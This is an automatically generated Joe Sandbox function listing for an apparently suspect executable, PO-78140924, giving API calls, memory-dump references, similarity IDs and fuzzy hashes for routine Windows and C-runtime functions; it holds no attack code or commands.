                                                Function 000891F5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,00088E09), ref: 00089203
                                                • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00089215
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: GetModuleHandleExW$kernel32.dll
                                                • API String ID: 2574300362-199464113
                                                • Opcode ID: 8cd185efa4157ba3f48f5170520716aa972047ce2ca4d9284ecba861b13af82f
                                                • Instruction ID: 62e2412c061b9fac4dd156d401ef86f570e44c8bc738cf3c2d95208dd603b43e
                                                • Opcode Fuzzy Hash: 8cd185efa4157ba3f48f5170520716aa972047ce2ca4d9284ecba861b13af82f
                                                • Instruction Fuzzy Hash: A6D01730654727DFEB20AF31DD1862676E5BF05351B15C83F99C6DA5A0EBB4D880CB90
                                                Function 00014C95 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00014C2E,?,00000000), ref: 00014CA3
                                                • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00014CB5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: GetNativeSystemInfo$kernel32.dll
                                                • API String ID: 2574300362-192647395
                                                • Opcode ID: 17d320f26f3d765ebef0f70a40626718632e94fd07c4138de151a2025094d819
                                                • Instruction ID: 03023721097141a497585ef678d3407e47c771d680f33d972644089cd624950a
                                                • Opcode Fuzzy Hash: 17d320f26f3d765ebef0f70a40626718632e94fd07c4138de151a2025094d819
                                                • Instruction Fuzzy Hash: C0D05B30511723CFDB605F31DD1965676D5FF05791B15C83ED885D6160D774D4C0CA90
                                                Function 00014D61 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,00014D2E,?,00014F4F,?,000D52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00014D6F
                                                • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00014D81
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                • API String ID: 2574300362-3689287502
                                                • Opcode ID: 1a67254d5a4a23b559f597f4b3a461674e9836b57913cb1f5d1668434b6cbda1
                                                • Instruction ID: 1f280e3a7cdc4d3d9c15d69260c413f065e2a4f94e00319dcaac46813faaa248
                                                • Opcode Fuzzy Hash: 1a67254d5a4a23b559f597f4b3a461674e9836b57913cb1f5d1668434b6cbda1
                                                • Instruction Fuzzy Hash: 46D01730610B13CFEB209F31EC1866A76E8BF15352B11883ED486DA260E7B4D8C0CB91
                                                Function 00014D94 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,00014CE1), ref: 00014DA2
                                                • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00014DB4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                • API String ID: 2574300362-1355242751
                                                • Opcode ID: e656c0e2262be926544967087b3f694539d9cfecf201683f150711640c27255a
                                                • Instruction ID: 7ebb76efc64b3231527206789beff10273bfbd850d042e90d0da8d1a6e810bad
                                                • Opcode Fuzzy Hash: e656c0e2262be926544967087b3f694539d9cfecf201683f150711640c27255a
                                                • Instruction Fuzzy Hash: F2D01230550713CFDB205F31E818A9676D4AF06355B11883ED8C5DA160E774D4C0C651
                                                Function 00066BD3 Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: Variant$AllocClearCopyInitString
                                                • String ID:
                                                • API String ID: 2808897238-0
                                                • Opcode ID: cbdf7d25fe730e3b2c0fafaced9d3f2e21c9ec1871dbf6eea761eb0c556a23da
                                                • Instruction ID: 55cc01131009de9fbbe30572061fc9621a0e8dab7dc7f6c85f2f0f7a7fab5dc7
                                                • Opcode Fuzzy Hash: cbdf7d25fe730e3b2c0fafaced9d3f2e21c9ec1871dbf6eea761eb0c556a23da
                                                • Instruction Fuzzy Hash: 8C51B934B047029BDB709F65D891ABDF3E6EF45310F20882FE596CB692DB7298808715
                                                Function 0003AF9F Relevance: 6.1, APIs: 4, Instructions: 127COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: __write$__getbuf__getptd_noexit__lseeki64
                                                • String ID:
                                                • API String ID: 4182129353-0
                                                • Opcode ID: 61824df4ce69621426fa439a91816e693bd3dc645774f77bc51737f0180928b3
                                                • Instruction ID: c01f8d74bc73c8872d209ea2c6c8f63b77cc08373b548a5989f9b7f8cfceed46
                                                • Opcode Fuzzy Hash: 61824df4ce69621426fa439a91816e693bd3dc645774f77bc51737f0180928b3
                                                • Instruction Fuzzy Hash: 4A41D3B1500B005FD37A9F69C851ABB77D89F41338F14C62DE6BA8B2D2D734E8408B11
                                                Function 00098883 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                                                Download Yara Rule
                                                APIs
                                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00098910
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: InvalidateRect
                                                • String ID:
                                                • API String ID: 634782764-0
                                                • Opcode ID: aa3aa4f655bc6dfb1341a5fc352acd3fa317257287672f0bc6cc35bc2d15936c
                                                • Instruction ID: 51eadf5c6037429a5b7438c0c95b8410f10a99575a814f5a92cbdbc75daaab0c
                                                • Opcode Fuzzy Hash: aa3aa4f655bc6dfb1341a5fc352acd3fa317257287672f0bc6cc35bc2d15936c
                                                • Instruction Fuzzy Hash: DA31EF30605208BFEF359A58DC49BBD37A5EB07320F588116FE51E63E1CE31A980BB52
                                                Function 0009AB69 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ClientToScreen.USER32(?,?), ref: 0009AB92
                                                • GetWindowRect.USER32(?,?), ref: 0009AC08
                                                • PtInRect.USER32(?,?,?), ref: 0009AC18
                                                • MessageBeep.USER32(00000000), ref: 0009AC89
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: Rect$BeepClientMessageScreenWindow
                                                • String ID:
                                                • API String ID: 1352109105-0
                                                • Opcode ID: b7baef91abe15843d16b7da17f621adf08b553a2d014a6f14da4c24dca90154f
                                                • Instruction ID: a5ba3e8a9963543a9fe35e2615fdc5a9f4a9d9cd21def3485dd73e96103fb34f
                                                • Opcode Fuzzy Hash: b7baef91abe15843d16b7da17f621adf08b553a2d014a6f14da4c24dca90154f
                                                • Instruction Fuzzy Hash: 8C418CB0B04615EFDF11CF58C884AA97BF5FB4A311F1880AAE814DF261D734E841EB92
                                                Function 00046345 Relevance: 6.1, APIs: 4, Instructions: 97COMMON
                                                Download Yara Rule
                                                APIs
                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0004637B
                                                • __isleadbyte_l.LIBCMT ref: 000463A9
                                                • MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,?,00000000), ref: 000463D7
                                                • MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,?,00000000), ref: 0004640D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                • String ID:
                                                • API String ID: 3058430110-0
                                                • Opcode ID: 8566ba1d8185b37aaa50779664465cec6d397514df6c3d71d64e0e52f7667e7d
                                                • Instruction ID: 879aca831346f1a2f60165964991488b32077e934239c1d330a4af29bf72698c
                                                • Opcode Fuzzy Hash: 8566ba1d8185b37aaa50779664465cec6d397514df6c3d71d64e0e52f7667e7d
                                                • Instruction Fuzzy Hash: 5731CEB1600286AFDF218F65C884ABA7BE9FF42351F154079F81487191E732DD50DB95
                                                Function 00030B0C Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                Download Yara Rule
                                                APIs
                                                • __setmode.LIBCMT ref: 00030B2E
                                                  • Part of subcall function 00015B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00015B8C
                                                  • Part of subcall function 00015B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 00015BB0
                                                • _fprintf.LIBCMT ref: 00030B65
                                                • OutputDebugStringW.KERNEL32(?), ref: 00066111
                                                  • Part of subcall function 00034C1A: _flsall.LIBCMT ref: 00034C33
                                                • __setmode.LIBCMT ref: 00030B9A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                • String ID:
                                                • API String ID: 521402451-0
                                                • Opcode ID: 02b83b4d591be5f2a57ccf399d653bfbb3d7e0857e2cea90b9923209f478f2a1
                                                • Instruction ID: dae12e0d1372e35a5c07ada64db0b270d2f29dd187ee4708a6d0cd7a7f42318e
                                                • Opcode Fuzzy Hash: 02b83b4d591be5f2a57ccf399d653bfbb3d7e0857e2cea90b9923209f478f2a1
                                                • Instruction Fuzzy Hash: 01112C32904604BEDB0677B49C47DFEBB6D9F86321F14405AF1046B1D3DF2558854795
                                                Function 00045262 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • _free.LIBCMT ref: 00045281
                                                  • Part of subcall function 0003588C: __FF_MSGBANNER.LIBCMT ref: 000358A3
                                                  • Part of subcall function 0003588C: __NMSG_WRITE.LIBCMT ref: 000358AA
                                                  • Part of subcall function 0003588C: RtlAllocateHeap.NTDLL(01450000,00000000,00000001), ref: 000358CF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: AllocateHeap_free
                                                • String ID:
                                                • API String ID: 614378929-0
                                                • Opcode ID: c51e272b17a7ce2a82d8025d14ce77811c1eb3ca94e53f7627d4bcfbafb27205
                                                • Instruction ID: e0cdebfca4df0df5539b7c0492d7cbb8f5bec1bcf28695f3ce6716170d40e6b5
                                                • Opcode Fuzzy Hash: c51e272b17a7ce2a82d8025d14ce77811c1eb3ca94e53f7627d4bcfbafb27205
                                                • Instruction Fuzzy Hash: B811CD72501B156FDB763F70AD056AE37DCAF06362F204537F904D6153DE788A408755
                                                Function 00014531 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • _memset.LIBCMT ref: 00014560
                                                • KillTimer.USER32(?,00000001), ref: 000145B5
                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 000145C4
                                                • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0004D5FE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: Timer$IconKillNotifyShell__memset
                                                • String ID:
                                                • API String ID: 809998890-0
                                                • Opcode ID: dd07d88a74d50edc4f2a62fc7d354c5db76cc63aefbd5fde243bb48b757c0e97
                                                • Instruction ID: 6231a462e44101f0e8f2291ddc91fc124699c9133e968c1b59cf68f02d9a27a8
                                                • Opcode Fuzzy Hash: dd07d88a74d50edc4f2a62fc7d354c5db76cc63aefbd5fde243bb48b757c0e97
                                                • Instruction Fuzzy Hash: CD21DAB0904B849FE7728B64C855BEBBBEDAF01308F04009FE68996152D7745AC48B51
                                                Function 000499D1 Relevance: 6.1, APIs: 4, Instructions: 63memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • __setmode_nolock.LIBCMT ref: 00049A28
                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00049A34
                                                • HeapFree.KERNEL32(00000000), ref: 00049A3B
                                                • __lseeki64_nolock.LIBCMT ref: 00049ABE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: Heap$FreeProcess__lseeki64_nolock__setmode_nolock
                                                • String ID:
                                                • API String ID: 2225363126-0
                                                • Opcode ID: b04bd69fc6446a71a1cd7ebf2e19d0b5e95aa7a338ed5d27e48a73dc67a69c2b
                                                • Instruction ID: fb269794b0a57fa1e91ea9779028b4df276c5dfe3d3076b36210bb4bcf87a9ee
                                                • Opcode Fuzzy Hash: b04bd69fc6446a71a1cd7ebf2e19d0b5e95aa7a338ed5d27e48a73dc67a69c2b
                                                • Instruction Fuzzy Hash: 8F11E3B2904500AEDB215ABC8C467BF7AB4EB01360F24037AF524D11E1D7354D6097AA
                                                Function 00011D35 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00011D73
                                                • GetStockObject.GDI32(00000011), ref: 00011D87
                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 00011D91
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: CreateMessageObjectSendStockWindow
                                                • String ID:
                                                • API String ID: 3970641297-0
                                                • Opcode ID: 9e907731ffd068ec460fc344da3f70109af821145cb176013fdd388386cf179b
                                                • Instruction ID: 583030f7ba99cd1c72cf8aa2cd38de321e6e7dace84837ecb1f8d13eb068f7db
                                                • Opcode Fuzzy Hash: 9e907731ffd068ec460fc344da3f70109af821145cb176013fdd388386cf179b
                                                • Instruction Fuzzy Hash: 53116172505619BFEF558F94EC84EEABB69FF09354F040116FA1496120CB75DCA0DBA0
                                                Function 00047137 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                • String ID:
                                                • API String ID: 3016257755-0
                                                • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                • Instruction ID: d94d1c810beef6ecac4f7f4c12b40a71def8665965aa3f2a1c2b9135405ff3d8
                                                • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                • Instruction Fuzzy Hash: 10014CB204814EBBCF526E88DC058EE3F66BF18394B598425FE5C58131D336D9B1AB85
                                                Function 0009B2F9 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetWindowRect.USER32(?,?), ref: 0009B318
                                                • ScreenToClient.USER32(?,?), ref: 0009B330
                                                • ScreenToClient.USER32(?,?), ref: 0009B354
